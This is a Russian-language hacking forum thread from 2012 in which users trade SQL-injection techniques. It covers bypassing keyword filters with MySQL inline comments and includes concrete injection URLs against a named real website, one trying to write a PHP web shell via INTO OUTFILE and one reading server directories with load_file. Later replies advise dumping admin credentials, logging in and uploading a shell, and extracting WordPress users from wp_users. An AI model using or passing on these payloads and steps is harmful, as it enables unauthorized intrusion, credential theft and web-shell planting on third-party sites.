
02.05.2012, 21:51
|
|
Постоянный
Регистрация: 02.02.2011
Сообщений: 727
С нами:
8039126
Репутация:
-6
|
|
Сообщение от Konqi
а чем ssl Может мешать твоей скуле?
ошибки отключены значит error based не катит, пробуй стандартный метод union select, Или посимвольно
ну я впринцепи хотел услышать ответ только о ssl.спасибо ;_)
|
|
|

03.05.2012, 16:54
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
|
|
|

03.05.2012, 17:25
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от d1v
посоны, нид хелп. наглухо фильтруется union, select, from. любое наличие одного из операторов приводит к редиректу, урл кодирование не помогло, нормализации нет (uni/**/on), POST фильтруется. хз что можно ещё придумать, но придумать нужно кровь из носа.
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из этой методички. Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
|
|
|

03.05.2012, 17:28
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
С нами:
9061916
Репутация:
0
|
|
Сообщение от Га-Ноцри
Обычно, когда я натыкаюсь на всякие редиректы, а также отданные сервером странички типа "Not Acceptable" и "Method Not Implemented" балуюсь с материалами из
этой методички.
Ну и нужно помнить про /*!sql-code*/ и /*!12345sql-code*/ Возможно, поможет.
я ведь написал - ЛЮБОЕ наличие оператора приводит к редиректу. все тривиальные методы испробованы.
|
|
|

03.05.2012, 17:32
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от d1v
я ведь написал - ЛЮБОЕ наличие оператор приводит к редиректу. все тривиальные методы испробованы.
Ну, я же не телепат и не могу знать, что конкретно вы использовали. Просто привел справочный материал, в котором довольно полно собраны все, как вы выразились, тривиальные методы. Ведь вполне возможно, вы что-то могли и упустить. В любом случае, я всего лишь хотел помочь. Удачи в вашем мозговом штурме.
|
|
|

04.05.2012, 16:19
|
|
Новичок
Регистрация: 08.05.2009
Сообщений: 8
С нами:
8952260
Репутация:
1
|
|
Пациент:
Fiile_priv Y + доступ к PhpInfo.
Пробовал залить мини-шелл след образом:
Сообщение от None
http://www.aviel.ru/txt/new.php?id=32270-9.999+union+select+1,'',3,4,5,6,7,8,9,10,11+from+m ysql.user+into+outfile+'/usr/local/www/aviel/www/txt/images/s.php'--
Выдает ошибку:
Сообщение от None
К сожалению, запрошеннaя Вами статья в настоящее время недоступна.
ЧТо можно с ним сделать?
P.S Если у кого-то есть время, то напишите плиз в ЛС, чтобы разобрать этот пример.
P.S1 эх, первый шелл был так близок =((...
|
|
|

04.05.2012, 16:47
|
|
Постоянный
Регистрация: 25.04.2011
Сообщений: 505
С нами:
7921046
Репутация:
53
|
|
Видимо вообще нету никуда прав на запись. Ищи админки от сайта/поддоменов, ищи пути до корней этих поддоменов, ищи настройки подключения к бд и таблицы с полями для авторизации, дампь лог/пас, заходи в админку и лей шел.
|
|
|

04.05.2012, 18:02
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
С нами:
8814194
Репутация:
0
|
|
skier529, у тебя там фряха стоит, поэтому можешь читать содержимое папки, а не только файла, потому пробуй админку посмотреть ну и тд и тп...
Пример:
Код:
http://www.aviel[antigoogle]ru/txt/new.php?id=32270-9.999+union+select+1,load_file('/usr/local/www/aviel/www')3,4,5,6,7,8,9,10,11+from+mysql.user+--+
|
|
|

04.05.2012, 20:37
|
|
Новичок
Регистрация: 19.01.2011
Сообщений: 14
С нами:
8059286
Репутация:
0
|
|
как получить список пользователей wordpress?без админки
|
|
|

04.05.2012, 21:45
|
|
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
С нами:
8566257
Репутация:
63
|
|
Сообщение от Cock3r
как получить список пользователей wordpress?без админки
если есть скуль,то раскручивать ее до инфы с таблицы wp_users
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|